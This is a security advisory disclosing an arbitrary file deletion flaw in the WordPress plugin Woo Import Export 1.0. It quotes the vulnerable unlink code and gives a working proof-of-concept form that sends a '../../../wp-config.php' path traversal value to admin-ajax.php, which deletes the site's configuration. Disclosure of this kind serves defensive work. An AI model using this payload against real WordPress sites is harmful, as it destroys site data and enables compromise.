Plugin Woo Import Export 1.0 Arbitrary File Deletion – Unlink

Details

  • Name : Woo Import Export
  • Version : 1.0
  • Homepage : https://wordpress.org/plugins/woo-import-export-lite/

Type

  • Arbitrary File Deletion
  • Remote Code Execution - RCE

Description

  • Type user access: any user registered.
  • $_POST['file_name'] is not escaped.

Code

File:  woo-import-export-lite/includes/classes/class-wpie-product.php Line: 3263
$file_name = isset( $_POST['file_name'] ) ? $_POST['file_name'] : "";
...
if ( $log_id != "" ) {
   
   $wpdb->query( $wpdb->prepare( "DELETE FROM " . $wpdb->prefix . "wpie_export_log WHERE export_log_id = %d ",
      $log_id ) );

   if ( file_exists( WPIE_UPLOAD_DIR . '/' . $file_name ) ) {
      @unlink( WPIE_UPLOAD_DIR . '/' . $file_name );
   }

   $return_value['message'] = 'success';

   $return_value['message_content'] = __( 'Successfully Deleted.', WPIE_TEXTDOMAIN );
}
 

Proof Concept

1 – Log in with any user. 2 - Execute form:
<form method="post" action="http://src.wordpress-develop.dev/wp-admin/admin-ajax.php?action=wpie_remove_export_entry">
   <input type="text" name="file_name" value="../../../wp-config.php">
   <input type="text" name="log_id" value="aaa">
   <input type="submit">
</form>

Results

wp-config deleted and restart the all system.

Note


Solution


Timeline

  • Date Discovery : 11/25/2017
  • Date Vendor Contact : 12/29/2017
  • Date Publish :
  • Date Resolution :